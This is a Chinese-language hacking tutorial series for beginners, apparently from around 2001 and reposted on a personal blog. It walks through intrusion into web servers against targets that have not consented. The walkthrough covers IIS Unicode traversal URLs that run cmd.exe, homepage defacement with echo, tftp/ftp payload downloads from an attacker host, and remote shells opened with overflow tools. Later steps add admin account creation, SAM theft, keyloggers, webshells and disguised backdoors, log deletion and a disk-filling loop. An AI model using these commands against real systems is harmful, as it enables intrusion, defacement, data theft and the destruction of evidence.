(轉自INTERNET)

 

第一節,伸展運動。這節操我們要準備道具,俗話說:「工欲善其事,必先利其器」(是這樣嗎?哎!文化低……)說得有道理,我們要學習黑客技術,一點必要的工具必不可少。

1,一台屬於自己的可以上網的電腦。這樣你可以有充分的支配權,上網不用說,否則你怎麼看到我的文章?wap?呵呵!屬於自己很重要,否則安全性是個很大的問題。第一點相信大家沒有問題。

2,windows2000/nt,別和我說98/me,他們是你們同學用來玩遊戲的!(當然,我也是鐵桿game fan)對網絡支持極差,命令受限制,很多軟件又不能用,對黑客來說使用起來絆手絆腳,非常不利。這裡我推薦2000,這是一個很成熟的系統(漏洞還是有一堆)。推薦雙系統,這樣黑玩搭配,幹活不累。

3,冰河。中國第一木馬,中者數不勝數,國人驕傲。雖然用冰河根本不能算黑客,但它確實能培養你對黑客的興趣,同時幫助你瞭解網絡,相信很多黑客同學都是這樣起步的。靜止寫的那篇冰河教程很不錯,大家仔細看看。而且,以後你學會入侵服務器後,用冰河操作也會減少工作量(我是懶蟲,爽!)

4,oicq。我們學黑客,可不是學泡mm!bfctx你………… 息怒息怒!我們當然是學黑客,但不要忘了,眾人拾柴火更高,我們通過cshu的成員列表,互相聯繫幫助,對提高水平很有幫助!另外我要廢話一句:據我瞭解,現在黑客網站下載最多的都是針對oicq的破解工具,我個人認為很無聊,偷個密碼代表什麼,浪費時間!最後補充:mm不能不泡。(誰砸我??!!)

5,superscan。很好用的端口掃瞄器,速度超快,功能一流,一旦擁有,別無所求……(打住!)不論是找木馬受害者,還是掃服務器端口,它都非常有效,cshu強烈推薦!

6,一本筆記本/便條,網上資料相當多,黑客處理的也是非常之多。良好的習慣決定了你的效率,準備一本筆記本,記錄下你的成果,肉雞,木馬利用,命令,密碼……堅持一下,你會發現你的效率大幅上升的!

7,lc3.著名nt/2000sam破解程序,有時我們拿不到足夠權限,又沒好辦法,那麼lc3是最好的解決辦法,只要你拿的到sam,你就是服務器它爺爺!本站有其破解程序,支持了暴力破解!

8,程序合併。這是玩木馬必需的,雖然木馬是很低的手段,但有時配合巧辦法(以後我會介紹)確實能夠達到意想不到的效果,朋友們可以在空閒時玩玩木馬,很有趣,若你能巧妙的騙過mm,那麼webmaster也可能被你騙倒:〉(比較理想化)

9,流光4for 2000/nt。可能是世界上最好的綜合類黑軟!中國的驕傲,它集成了很全的漏洞信息,速度快,方法多,對有漏洞的主機是毀滅性的打擊,操作又方便,是快速黑站必不可少的精品工具。超級吐血推薦!!

10,良好的心態,穩定的情緒,刻苦鑽研的精神,刨根問底的作風,打掃房間的習慣。黑客是門很高深的學問,不要幻想一步登天,失敗是常有的事,千萬不可灰心。在那麼多黑軟的包圍下,切不可完全依賴他們,一定要瞭解它們利用什麼原理工作。對任何一個小問題,小細節,一定要問清楚,cshu就是給大家互相交流的場所哦!黑完後不要得意忘形,打掃戰場也很重要,以防萬一。

第一節操完,可能很無聊,我就這點水平,大家見諒!這裡我說一句大話:做完菜鳥操,包你會黑簡單的站(哎喲!心慌了!)

下一節操我們要介紹如何掌握一台主機的基本信息,期待中……

---------------------------------
真是太對不起大家了,隔了那麼久才寫這篇教程,我這幾天實在太忙,大家還是體諒一下我吧,好了,開始做操。

今天的內容是獲得主機的信息。 我們要黑一台主機,首先要瞭解它的信息,包括它的類型,用戶列表,目錄,端口,漏洞等等。

首先我們我們要找一台主機來練手,隨便挑吧!www.flyingfish.com(亂說的)

第一部,呵呵,先在ie裡看看吧,mmmm.....做的還行,挺精緻的!主要是我們肯定了它現在是正常的。然後,我們應該知道它的ip,很簡單,ping它一下就可以了。

ping www.flyingfish.com,看看窗口裡有了什麼?是不是有三行回應,其中的111.111.222.222就是ip了(還是胡說的,一個例子)。有人是不是要問,我這裡怎麼沒有。那可能是兩個原因,第一,你打錯命令了;第二,該主機裝了防火牆,禁止ping,不過這種可能很小。

知道了ip,下一步應該確定端口了。下面是一些常用的端口的默認值

21--ftp 重要哦

23--telnet 歡呼吧

25-smtp 儘管重要,但似乎沒什麼可利用的

53--domain 同上

79--finger 可知道用戶信息了

80--http 要看網頁,沒它不行吧

110--pop 收信的

139--netbios 共享用的,很有利用價值哦

3389--win2000超級終端 呵呵,這個好!

其實端口有上千種,這些最最常用

我們怎麼知道服務器有什麼端口打開呢??去找個掃瞄器吧,x-scan ,super scan,flux等等很多哦。這裡我推薦super scan ,速度很快,本站也有其教程哦!用法還是比較傻瓜的,估計大家不會有問題,輕輕幾點,打開的端口就出現了。不錯不錯,上面說到的都有(太理想化了吧!)

那麼我們該如何應對呢?

ps:忘了說一聲,順便掃一下7626,冰河有也說不准哦:)

若有ftp,那就用用匿名登陸。自己動手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望

telnet在!好!telnet 111.111.222.222,出現窗口了吧!嗯?要密碼?看來網管還不是超級白癡:)隨便猜個,錯了,閃人!

smtp,看著它,無奈

domain,一般它帶了局域網了

finger 可以知道用戶列表了,不好,忘了用法了,幸好finger很少出現

80肯定在,我們等會來對付它

110 有smtp,pop在也不奇怪了

139 找個掃瞄器來找找有沒有露在外面的共享吧,日後也用得著

3389 太太太好了!!打開客戶端吧,用輸入法漏洞試試,成了就干了它!不成也沒事,我們以後完全控制它3389會很方便的。

端口掃完了!我們在多瞭解它一點吧!追捕大家都知道吧,其實用它獲取主機信息也不賴哦。打開追捕,輸入ip,選擇智能追捕,是不是有很多信息出來了?雖然不能直接利用,但畢竟我們有對它有了進一步的瞭解。

掌握了那麼多信息,我們該做點什麼了,一般黑客入侵都是靠著系統漏洞,不會都傻傻地去暴力破解的。我們現在就要看看它有什麼漏洞。

對漏洞大家可能不太瞭解,我這裡也不能一一說明了,太多了,感興趣的話去論壇找freedom吧!

目前廣泛利用和存在的漏洞有:unicode,unicode後續,iis溢出,.idq,.frontpage extend,輸入法漏洞等等大漏洞。 至於如何確定,呵呵,絕對不會是一行一行地在ie中試吧,拿出x-scan吧,很好的掃瞄器哦!

稍微設置一下就上路吧!過了一會,呵呵,報告出來了,快看,哇!漏洞一大堆!這下賺了!各條漏洞都有詳細的信息,大家看吧,總比我說的準了。

現在這台主機已經和我們成為親戚了,要讓這位親愛的親戚做點事,就要開始各種攻擊了,下回我們就探討一下最最可愛的unicode漏洞,各位可能就會在unicode中完成第一次黑客體驗,再見:)

------------------------------------------
今天我們談談unicode漏洞,這可是基礎中的基礎,重點裡的重點,不懂的一定要好好學。

2000年10月17日中聯綠盟發佈了以下的安全公告:

微軟IIS 4.0 / 5.0 擴展UNICODE目錄遍歷漏洞

遠程漏洞:是

本地漏洞:是

發佈日期:2000年10月17日

更新日期:2000年10月17日

受影響的版本:

Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0

這可是中國乃至全球網絡安全界的一次大變節,入侵nt/2000系統變得如此簡單,不打補丁的死路一條。

下面開始正式學習:

一,UNICODE漏洞的原理

此漏洞從中文IIS4.0+SP6開始,還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台灣繁體中文也同樣存在這樣的漏洞。

中文版的WIN2000中,UNICODE編碼 存在BUG,在UNICODE 編碼中

%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'

%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'

在NT4中/編碼為%c1%9c

在英文版裡: WIN2000英文版%c0%af

在中文win2k裡:%c1%1c

此外還有多種編碼,不一一闡述。

本文例子均以win2k為準,其他類型請自行替換。

二,一切從基礎開始

由於winnt\system32\cmd.exe的存在,使遠程執行命令變為可能,在瀏覽器裡輸入以下請求:(假設11.11.22.22有漏洞)

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

學過dos的應該可以看懂,其實就是利用當中的非法請求使我們可以連到system32下,如果inetpub\目錄不合winnt同盤,或者目錄級數有改動,可能會引起請求失敗。

如果成功,那麼在瀏覽區可看到如下信息:

Directory of C:\inetpub\scripts

2000-09-28 15:49 〈DIR〉 .

2000-09-28 15:49 〈DIR〉 .. (假設目錄中沒有文件,實際上有一大堆)

是不是有自己機器的感覺了,正點!就是這種感覺!

cmd.exe相當與dos裡的command.com,因此,我們可以執行很多命令了!

http://11.11.22.22/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir (這個命令同樣道理)

大家請注意:/c後面的+,實際上,他就是空格,請記牢!dir開始就是dos命令了,我們可以更改一下:

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe

會dos的朋友一定懂其意義了,不懂的請去看書 .

不用說,大家也知道我們就可以利用它來對有漏洞的機器展開攻擊了!

三,實戰演練

1,修改主頁!(是不是很爽?)

一般主頁位置在c:\inetpub\wwwroot下,但要是改了路徑,就需要找找了。

最方便的方法:在瀏覽器裡輸入 http://11.11.22.22/.ida要是有漏洞,那在瀏覽器裡便會顯示主頁路徑,這個漏洞存在率很高,自然是我們的首選。

分析法:用dir看各個盤符的根目錄,看可疑的就進去看,運氣好的在一分鐘裡找到,這要看運氣和直覺。

dir/s法:首先在看其主頁,找個圖片或連接,看它的文件名,比如,11.11.22.22首頁上有一幅圖片,右擊,屬性,看到了嗎?iloveu.gif,然後我們利用unicode輸入這條命令dir c:\iloveu.gif /s意味著查找c盤下所有目錄裡的iloveu.gif,注意實際應用時別忘了把空格改為+,如果沒有繼續找d盤,很快就能確定主頁目錄的。

找到了目錄,就要對它開刀了!一般默認收頁為index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一個,現在我們確定11.11.22.22中為index.htm

那麼我們就修改它吧!

最方便的方法:echo法。echo是一個系統命令,主要用於設置回應開關,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat裡並刪除原有內容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不刪除原有內容,這樣我們就可以逍遙的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

回應為:HTTP 500 - 內部服務器錯誤

通過對cmd的分析,袁哥得出一條簡便的方法,加入"符號

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm

回應為:cgi錯誤,不用理會

兩條命令一下,呵呵,再看看11.11.22.22,是不是烙上我們的大名了?不錯吧

而在實際操作中,可能袁哥的方法也會失效,這時,我們就可以copy cmd.exe 為另一個exe,記住路徑,用copy後的來echo

例如:11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe

11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm

2,上傳法:echo有點不講道理,把人家的文件破壞了,要是想在主頁上增光添彩,那就應該用改好的主頁上傳,這個我們後面介紹。

幾點忠告:

1,對於沒有主頁的機器(就是正在建立的主頁),不要改它,這很沒水準,也很沒道德

2,echo前記得幫他們做好備份

3,不准在主頁裡加入惡性語句

2,下載文件

要是有什麼有用的文件被你發現,那我們如何下載呢?

最簡單的方法:把文件copy至網頁目錄下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然後,下載11.11.22.22/baby.zip就行了,注意!實際應用中要記得對文件名進行修改,總之不能暴露。

別的方法:對不起,沒想好:)

3,最重要的上傳

一般方法:ftp法

首先建一個ftp腳本文件:c:\hehe.haha(名字亂取把),申請一個ftp賬號,然後用echo吧

echo+open ftp.cshu.com(ftp主機) > c:\hehe.haha

echo+user yourname >> cc:\hehe.haha (yourname是用戶名)

echo+yourpasswd >> c:\hehe.haha (yourpasswd是密碼)

echo+get setup.exe >> c:\hehe.haha 要下載的文件

echo+quit >> c:\hehe.haha

完了以後:ftp+/s:c:\hehe.haha,由於是ftp主機,那麼速度一定很快,過一會setup.exe就會出現在當前目錄了(也就是cmd所在目錄)

別忘了先上傳到ftp主機,不要做馬大哈哦!

最簡單的方法:tftp法。

這種方法不用中轉服務器,首先準備一個tftp服務端,它的作用就是把你的機器做成一個tftp服務器,利用漏洞機器來下載(注意,運行tftp時不要運行其他的ftp軟件)

在這裡我推薦cisco tftp server,自己去找找把,實在沒有來找我:)

安裝好後運行,別忘了設置好默認目錄,否則會找不到文件

tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在默認目錄裡)

1.2.3.4為你的ip,用unicode運行一下,會看到tftp server裡有反應了,這就好了,不一會,文件就傳上去了,方便把!

學會了上傳,我們就可以好好改主頁,還可以上傳木馬,還可以把程序放上去運行…………(運行程序和在dos裡一樣)

4,如何清除痕跡

雖然國內主機紀錄ip的不是很多,但萬事小心為妙,unicode權限達不到admin。用cleaniislog行不通,就…………直接刪吧!

C:\winnt\system32\logfiles\*.*

C:\winnt\ssytem32\config\*.evt

C:\winnt\system32\dtclog\*.*

C:\winnt\system32\*.log

C:\winnt\system32\*.txt

C:\winnt\*.txt

C:\winnt\*.log

全……擦掉!

四,細節問題。

1,遇到長文件名怎麼辦?

c:\program files\

就用c:\"program20%files"\

2,遇到空格怎麼辦?

20%代替嘍,或者xx yy=xxyy~1

3,如何做個很大的文件?

目的就是破壞啦!我不喜歡不過教教你們啦

@echo off

echo big > c:\a.a

:h

copy c:\a.a+c:\a.a c:\a.a

goto h

注意不要亂來啊!

4,輸入命令,沒反應或反應不對。

:)請檢查檢查再檢查命令的正確性,可能沒有漏洞,那就閃人!看在你看到這裡那麼給我面子的份上,在給你幾個吧!

http://www.exsample.com/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir+c :\ 或http://www.exsample.com/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\http://www.exsample.com/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\http://www.exsample.com/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

不一定有用哦!

5,如何找到unicode漏洞的主機

呵呵:)最好的方法自然是………………一個一個ping,一個一個試嘍:)

不要打我呀!我說我說。最好找一個cgi掃瞄器,unicode查找器多如牛毛,隨便找個吧!

6,我copy,del文件,怎麼顯示aceess denined?

這個不好辦了,由於unicode所擁有的權限有限,出現上述情況很正常,我們要做的便是提高自己的權限!

這個我會在今後介紹,現在你可以試試attrib

attrib -r -h -s c:\autoexec.bat

再對autoexec.bat進行操作,看看有沒有效果,成功率不高,不好意思!

7,我黑了主頁,天下無敵?

我本來想對你說:「見你的鬼去吧!」不過想想不大禮貌,有失我紳士風度,所以改個口

echo主頁或改主頁在不懂黑客的人看起來很了不起,不過,它最多算是一個基礎,拿到admin才是我們的終極目標!

對cshu全體成員來說,不准去改正在建立的網頁!這是我們的原則!

要是你想耍耍威風,那也可以理解,那就去黑外國的,或者url欺騙也是個好選擇

8,我如何做更多的事?

第一,努力提高權限

第二,由於cmd的限制,我們可以做的不多,那就要程序幫忙,上傳吧!切記,要隱秘!
-----------------------------------------


一,frontpage擴展攻擊。

為什麼把它放第一位呢?原因很簡單,它最最方便,frontpage服務器擴展是一種方便的遠程站點管理功能,可是由於某些網管白癡的疏忽(為什麼白癡滿街飛?)不設置訪問密碼,如果那樣的話,我們只要用一個frontpage就可以黑它了!!這完全不是黑客工具,但它確實辦到了,還要感謝白癡網管和微軟啊!

具體做法:

1,準備frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。

2,找一台有frontpage擴展的主機,可以用流光,也可以用搜索引擎查找/_vti_pvt/,這是frontpage擴展的標誌。

3,接下來打開frontpage,(媽媽:你在幹什麼?回答:做網頁!媽媽:好孩子!^_^)文件菜單下選擇「打開站點」,然後在文件夾框裡寫入http://11.11.22.22(我習慣用這個做例子,以fp2000為準)注意http://不要漏掉。在按下「打開」按鈕前,不要忘了祈禱:)一兩秒後,出現了文件夾,好啊!成功了,現在就可以操作網頁文件了。

4,萬一跳出錯誤信息,表示有密碼(這個不算白癡)這時我們試著用以下url,http://11.11.22.22/_vti_pvt/service.pwd,這是默認的密碼文件,下載下來,應該是unix的加密,找個解密器破密碼吧!運氣好的話還可以改網頁。

我的看法:

這個漏洞只能說明網管的疏忽,對我們而言是沒有什麼利用價值的,只可以改改網頁,也許這也夠了,但要進一步控制主機,此漏洞就無能為力。消遣時可以玩玩。

 

二,iis.printer溢出攻擊

據說緩衝區溢出攻擊是黑客入侵時70%所選的方法,看起來有點誇張,但確實有道理,因為暴力密碼破解在網絡上變得非常之慢,而像unicode的解碼漏洞所取得的權限又太低,而緩衝區溢出一般可取得system權限,是非常有用的!

具體原理我也不是很清楚,只能說個大概:當我們向系統發出超出緩衝區大小的數據處理請求時,便會引發溢出,並彈出錯誤對話框,我們常看到的「非法操作」其實也是可能是由於溢出。而當溢出時,eip發生錯誤,有彙編知識的朋友應該記得,eip是控制執行代碼的位置(順便問一下,有沒有會crack的高人,記得做我老師)這時加入一段惡性代碼,算好發生溢出時的eip值,這樣溢出時就會執行惡性代碼而不是當掉。非法操作我們知道多的不得了,因此……溢出攻擊是非常強大的!

由於彙編對於我們來說較難掌握,加之對溢出的瞭解很有限,那麼我們只能借助高手們的程序來黑了。

具體方法:

1,準備iishack,本站有下載,該版本可以對多種系統進行攻擊。

2,用x-scan或流光掃瞄一個有iis.printer漏洞的主機,然後就可以攻擊了。

3,在命令行方式執行iis5hack (主機ip) (端口號,默認80)(系統代號,具體可參考程序的說明)( shell口)

例如:iis5hack 11.11.22.22 80 1 111(以為在111端口開一個shell)

4,用nc或telnet連上,nc/telnet 11.11.22.22 111,成功的話就可以控制機器了,加個用戶,做個代理……

我的看法:

這算是一個比較有用的漏洞了,它能幫助我們取得system權限,其實和admin差不了多少了,對於做一台跳板是非常有利的,希望大家熟練掌握。

  

三,idq/ida漏洞溢出攻擊

這是時下很熱門的了,原理和上面的printer相似,目前我只找到了iis5的攻擊程序,在cshu裡也可以找到的,我們準備的是snake的gui版本,很方便的。

具體方法:

1,準備snakeiis溢出程序。可以從本站下載。

2,ida/idq漏洞很多的,但win2k的服務器就不是那麼普遍了,所以用你熟練的掃瞄器去找一打win2k的機器吧。

3,程序的界面是很傻瓜的,把ip填入,選擇好類型,按下溢出按鈕,顯示shellcode發送完畢。

4,telnet/nc到你設定好的端口,如果成功的話,會顯示目錄下的信息(因為默認shellcode是dir)

5,歡呼吧!再次溢出,別忘了改shellcode為你想要的代碼哦。

6,重複4,很快一台新鮮的win2k被你控制了!

我的看法:

我很喜歡用這種攻擊,因為win2k的3389可以很方便的為我做事,省力地搞到一台win2k,然後慢慢享用,爽到根尖細胞啊!大家應該掌握這項方法。

  

四,*bsd telnetd溢出攻擊

又是溢出,不過這個可是真正的熱點哦,最近紅盟等大型安全網站被黑就是因為這個!所以看看吧

具體方法:

1,使用fbsdhack for win2k來攻擊,本站有下載的

2,還是要找到這樣的主機,一般是xnix的,比較少的,用專門的掃瞄器吧,我會在不久放出來。

3,等吧!這個漏洞要發送的信息很大,大約16mb,可怕吧,所以最好用高速肉雞

4,有幸成功了,記得請我吃飯!

我的看法:

這個漏洞的利用比較有難度,從找機器開始就是。但作為黑客愛好者,我們沒有理由去迴避它!

 

五,密碼暴力破解

這是最最原始,也是最最基本的攻擊的方式了,利用字典文件或暴力模式,對密碼進行探測。費時費力,但若有經驗的話,可以縮短這一過程。

具體方法:

1,找一個破解器,有ftp,http,smtp,pop3,telnet等等類型。

2,找到一台相應的主機。

3,設定一番,上路吧!你可以睡覺,可以去machine(就是做作業),可以去泡妞……就是不要傻等。為什麼呢?因為會傷視力的:)怎麼倒了一片,起來起來!

4,萬一成功了(之所以用這個詞,是因為成功率很低的)表明你運氣旺,趕緊下線,買彩票去吧^_^
--------------------------------

大家好,這幾天被cgi程序搞得頭昏腦脹,主要還是51的錯,什麼破東西,那麼多錯誤!現在只好暫時借人家的地方用。

這是菜鳥操的最後第二節,說實話我還可以寫很多的,但是作業還欠了一大堆:(為什麼我沒有滿舟的狗屎運?算了算了,我不合那種欺世盜名之輩一般見識,開始做操吧!

不知道大家對unicode和溢出攻擊是不是熟練了?沒有的要加油哦!今天我們來談談權限的提升。

在windows系統中,最高的權限掌握在administrators的手裡,在xnix中稱為root,我們要完全掌握一台機器,拿到admin是不可或缺的。

首先說說最簡單的:system to admin

當我們用溢出攻擊成功後,其實我們已經拿到了system權限(具體看每種攻擊而可能有所不同)這時我們很容易拿到admin權限。首先看看一下命令:

net user 察看用戶表  net user username pass /add(添加密碼為pass的用戶username)

net localgroup 察看組 net localgroup guests cshu /add 把cshu用戶加入guests組

net use \\ip\ipc$ "password" /user:username 這是遠程連接的命令

假如我們溢出了11.11.22.22,那麼這樣做吧!

net user (看到了iusr_machinename的用戶了,它一般沒什麼權限的)

net user iusr_machinename cshu (把它的密碼設為cshu)

net localgroup administrators iusr_machinename /add(加入administrators組)

這樣我們就擁有了iusr_machinename這一賬號,admin權限,簡單吧!

熟悉一下net use 命令:

net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立連接

copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 複製到機器c:\winnt\system32上,若是c$.d$,就表示c,d盤

net time \\11.11.22.22 看到了時間了,比如是8點

at \\11.11.22.22 8:03 haha.exe 就會在8點3分執行。

net use \\11.11.22.22 /delete 斷開連接

應該是很簡單的。這樣我們就可以隨心所欲地操作11.11.22.22了,admin是最高權限,所以沒有限制的:)

是不是很簡單?所以我是溢出是很厲害的攻擊方法。

 

3389知道吧!如果能進入,那麼用上面的命令也可以輕易拿到admin的,不過呢,有3389漏洞的機器已經不多了。看你運氣了!(本站有幾篇關於3389的好文章)

 

總的來說,還是unicode的機器最多,為什麼白癡網管不會滅絕呢:)雖然unicode拿admin有一定難度,但還是要試試的。

首先,我們檢查一下unicode在這台機器上的權限,一般看讀寫權限和運行權限。用copy 或del命令便可確定讀寫權限,然後上傳文件運行一下便可知道運行權限。

1,如果我們可以對winnt\repair和winnt\config進行訪問,sam文件就在裡面(win2k裡是sam,nt4里是sam._)那麼用tftp 把get改成put下載下來,或者把它複製到inetpub\wwwroot下,改成zip下載。

拿到sam後,用lc3破解版暴力破解吧,這種方法比較費時。

2,要是有運行權限,拿就拋個木馬上去吧!雖說木馬可能也會沒有權限,但自啟動的模式在admin登陸後可能會自己提升了權限。要注意的是,最好放最新的木馬,因為木馬很容易被殺毒軟件查殺!

3,其實和2差不多,只不過變成了鍵盤記錄器,選個國產的,一般殺毒軟件不會殺出來,認真配置好後傳上去,下線睡覺或是做家務去!等到網管用了機器,密碼就會被紀錄下來,我們在去取,admin就順利到手了:)

4,getadmin和pipeupadmin,前者是nt4用的,後者是2000。看看幫助知道使用方法後(其實猜都猜得到)就可以提升一個用戶的權限,有一步登天的感覺!

5,手工做個bat文件,裡面是建立用戶等命令,然後把它放到自啟動下,有很多途徑:documents and settings下的開始菜單下的啟動,知道了吧,至於要順利放進去的話,會遇到空格長名等等問題,就看你的基本功了。win.ini裡有load,加進去。還有便是註冊表,好好研究一下regedit.

6,本地溢出。這個比較高深,我能告訴大家的只是,去四處找找本地溢出程序。

總的來說,unicode改主頁是非常簡單的,但是若是要取得更高的權限,就要一番努力,上面的方法只是些思路,實際操作時需要具體處理,開動腦筋,把方法都結合起來。(是不是聽起來有點玄?)

  

想想好像沒有什麼其他的途徑要說了,什麼?linux,呵呵,我還不大懂,就不在這裡瞎說了。

那今天就說到這裡了,6里面我會說說後門製作,小問題和我的一點經驗。期待吧!
----------------------------------------
這是最後一節了,寫的傻傻的,但我畢竟堅持下來了,值得鼓勵!(偶爾阿q一下)在寫菜鳥操的同時,我們的cshu(cshu.51.net)也在默默成長,但現在我要準備離開了,真是有點捨不得。在今後的日子裡,還請大家多多支持cshu和christ,freedom他們。

今天說點什麼呢?沒有主題,亂談一通吧!

首先我要吐一次血,當然是為了推薦一樣東西,就是流光!(那麼沒創意,老土!)不管怎麼說,小榕的流光應該是中國第一黑軟,他綜合了諸多的攻擊手段,使攻擊便捷化,當然可能讓我們養成了懶惰的習慣。不會用流光的最好去學學。

我來說說我自己覺得最有用的幾個項目:

1,探測----掃瞄pop3/ftp/nt/sql主機,要是無目的地黑,那麼用這個再合適不過了。進去後填好ip範圍(範圍可以掃大一點,它很快的),至於類型嘛,要是你要一大堆unicode,那麼選擇iis/frontpage再合適不過了,要是要更高的權限,sql是不錯的選擇。完成後,表格裡會多出一大堆東西。

remote execute-x  這是幾種不同的unicode,用它比用ie來執行方便多了,但是echo有問題(是我自己不會,會的朋友快教我)

remote ftp pcaw file method-x 這是遠程獲取pc anywhere的密碼文件,要使用的話,你首先要有一個ftp賬號,去申請吧!順利拿到cif文件後,用流光自帶的工具就可以解開密碼,很爽的!

remote ftp sam -x 拿sam的,還是用最好的lc3來解吧!

frontpage extended 這是frontpage擴展,不過不要高興,是要密碼的。但是若是後面跟了privilege hole的話,放聲大笑吧!(小心不要讓鄰居拿著菜刀衝進來)打開frontpage,打開站點,http://ip就可以了!(http://不要忘)

此外還有一點變通,大家肯定讀的懂的。

2,探測----高級掃瞄工具。這可是流光4中的重頭戲,綜合了很多漏洞,還可以用plugin功能加入新的漏洞。這項功能很適合對某一站點進行探測,很快掃出漏洞後,流光會生成一個報告文件,其中包含漏洞的連接,要是你看不懂的話,建議你拿出x-scan,裡面有漏洞描述的。

3,工具----nt管道遠程命令,種植者,這兩項功能對我們攻擊nt來說是相當好用的。但前提是要有賬號,相信在此之前你應該有幾個了吧,那就快點試試吧!

總的來說,流光的使用是非常簡單的,其中也有不少工具值得我們一用,tools目錄裡有一些很好的工具,exploit裡則有很多溢出攻擊程序,前提是你應該會c,不會的話我也沒辦法,學會c起碼要看10倍於菜鳥操的資料吧!另外給大家推薦一個站點:www.hack.co.za,有什麼漏洞的話就去那裡找找,你會有所收穫的。

 

然後我想說說一些黑站的經驗。

☆當我們用unicode控制一台機器時,我向大家推薦用asp木馬,阿新的改良版,本站有下載的。上傳asp文件前不要忘了修改list.asp中的地址信息,最好也放一個cmd.asp上去,運氣好的話,可以運行命令的。

上傳好後,ie裡輸入其中index.asp的地址,呵呵,我們就能方便地管理其中的文件了,可以改網頁,改代碼,上傳腳本文件麻煩?那就用它來生成吧!

推薦他的最大原因便是----便於隱藏!一般網站總有一個龐大的目錄,選擇一個深的,放進去,網管很難發現的:)

最後對大家說一句,要是有備份目錄(很多網站都有的),最好也放一份進去。有一次我用這個東西修改一家網站的首頁,改了兩三次網管也沒刪掉,可是突然一天不行了,原來他用了備份的網頁(還算機靈吧)

☆我想對大家說,對於國內網站,最好不要惡意去攻擊,因為我們是中國人嘛!在5/1期間,我發現有一些國內站點被黑,留下的頁面上不是poison box,而是中國人的話,這真是無恥到了極點!!!!大家千萬不要學哦。還有,現在網上有很多還沒有網頁的主機,往往有很多漏洞,對於這種機器,竟有一些小人也會去改收頁(比如上海那個姓楊的小子)這算什麼?顯示實力,炫耀技術?呵呵,見鬼去吧!

我的建議是,不要改它的首頁,而是努力去拿admin,控制它,這樣我們有很多選擇:肉雞,等它有正式主頁後可以黑,或者把我們的主頁放上去!比申請好多了,權限又足!當然很危險:)這樣做是不是有品位多了?

☆要是我們拿到了admin,但有時卻不能執行一些命令,那很可能是因為服務啟動的問題。試著用以下命令:

net start termservice  啟動win2k的終端控制

net start workstation  打開net use 功能

net start lanmanserver  打開ipc

net start eventlog  啟動日誌(你不會那麼傻吧!stop)

net start schedule  打開計劃(at)

net start server 共享

還有很多,net命令裡去找吧!

☆打開telnet

1,遠程去運行ntlm.exe,流光裡有

2,net stop telnet

3, net start telnet

☆我推薦幾種後門:winshell(默認端口5277)相對於srv,它好一些。remotenc這個是榕哥的作品,可以以指定用戶執行,還可以自己起服務的名字,很棒的!

至於服務的名字,建議大家去看看win2k的進程名,學著起相類似的名字,要做到使網管看到了也不會引起警覺,或是有警覺也不敢去刪,呵呵,這樣就最好了!

☆代理問題。我推薦大家自己去做代理,控制了一台機器後,用snake前輩寫的skserver去做個sock5。

具體做法就不詳細說了,因為比較普通,只要熟悉一下用法就可以了。

做好了sock5,我們可以上oicq,下棋都用它,sock5代理可是很少見的哦!

要是實在拿不到sock5,用http也可以,這裡推薦一個軟件tcp2http,它具有很多功能。在給個站點:dzc.126.com國內最最好的的代理站點,怕死的朋友千萬不要錯過。

 

最後說說一些對於菜鳥同志的建議:

不要把黑當作一種顯示自己的行為,要是你想耍威風,用url欺騙來騙mm最合適了,還可以弄個yahoo什麼的……

不要在一項技術上停留過長時間,當你熟練掌握後,應該迅速學習下一個新技術。

不要和被你黑的網管過多接觸,前車之鑒哦。

對於一台好機器要做好後門,不要輕易失去它。

想好好學黑客的話,就常去各大論壇轉轉,仔細讀教程,忘記聊天室和網絡遊戲吧!

實踐是最好的教程,再次重申!

應該多學計算機的其他方面的知識,任何知識在一定場合都是有用的。

編程技術……好像太難了,不過再難也要學。

想不出來了………………

 

好了,我們的菜鳥操終於結束了,我這個大菜鳥也可以退休了,拚搏一年後我會回來的。第一節裡我曾許諾讓大家學會黑站,不知道大家是否成功了,不管這麼樣,我們都該不斷的努力學習,不是嗎? 

 

 

By tony

自由軟體愛好者~喜歡不斷的思考各種問題,有新的事物都會想去學習嘗試 做實驗並熱衷研究 沒有所謂頂天的技術 只有謙虛及不斷的學習 精進專業,本站主要以分享系統及網路相關知識、資源而建立。 Github http://stnet253.github.io

發佈留言

